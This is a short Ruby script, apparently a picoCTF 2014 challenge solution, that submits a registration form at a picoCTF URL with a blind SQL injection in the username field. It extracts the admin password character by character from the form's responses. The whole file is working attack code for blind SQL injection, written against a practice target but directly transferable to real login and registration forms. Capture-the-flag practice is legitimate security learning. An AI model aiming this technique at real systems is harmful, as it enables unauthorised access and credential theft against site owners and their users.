injection4.rb

require 'mechanize'
require 'pry'

URL = 'http://web2014.picoctf.com/injection4/'
INJECTION = "admin' AND password LIKE '"
CHARS = ("a".."z").to_a

agent = Mechanize.new

page = agent.get URL
form = page.forms[1]

flag = ""
solved = false
until solved
  solved = true
  CHARS.each do |char|
    form.username = INJECTION + flag + char + "%"
    new_page = agent.submit(form)
    if new_page.body.include? "Someone has already registered"
      flag += char
      print char
      solved = false
      break
    end
  end
end
puts